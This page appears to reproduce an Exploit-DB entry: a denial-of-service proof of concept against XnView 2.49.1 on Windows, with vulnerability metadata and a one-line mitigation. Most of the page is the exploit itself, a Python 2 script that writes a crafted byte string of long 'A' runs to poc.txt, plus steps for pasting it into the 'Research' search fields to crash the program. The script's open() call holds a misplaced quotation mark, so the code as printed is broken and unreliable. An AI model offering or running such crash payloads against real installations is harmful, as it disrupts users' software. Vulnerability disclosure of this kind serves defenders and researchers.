XnView 2.49.1 - 'Research' Denial of Service (PoC)

vendor:

XnView

by:

ZwX

7.5

CVSS

HIGH

Denial of Service

Dos

CWE

Product Name: XnView

Affected Version From: 2.49.1

Affected Version To: 2.49.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7

2019

XnView 2.49.1 – ‘Research’ Denial of Service (PoC)

This exploit allows an attacker to crash XnView for Windows by creating a file with specific characters and using the 'Research' feature.

Mitigation:

There is currently no known mitigation for this vulnerability. Avoid opening suspicious files or running untrusted scripts.

Source

Exploit-DB raw data:

# Exploit Title: XnView 2.49.1 - 'Research' Denial of Service (PoC)
# Exploit Author : ZwX
# Exploit Date: 2019-12-17
# Vendor Homepage :  http://www.xnview.com
# Link Software : https://www.xnview.com/fr/xnview/#downloads
# Tested on OS: Windows 7

'''
Proof of Concept (PoC):
=======================

1.Download and install XnView
2.Open the XnView for Windows tools 
3.Run the python operating script that will create a file (poc.txt)
4.Run the software " Tools -> Research -> A search window opens "
5.Copy and paste the characters in the file (poc.txt)
6.Paste the characters in the field 'File Name' and  'In' click on 'Research'
7.XnView for Windows Crashed
'''

#!/usr/bin/python

DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")

poc = DoS
file = open("poc.txt,"w")
file.write(poc)
file.close()

print "POC Created by ZwX"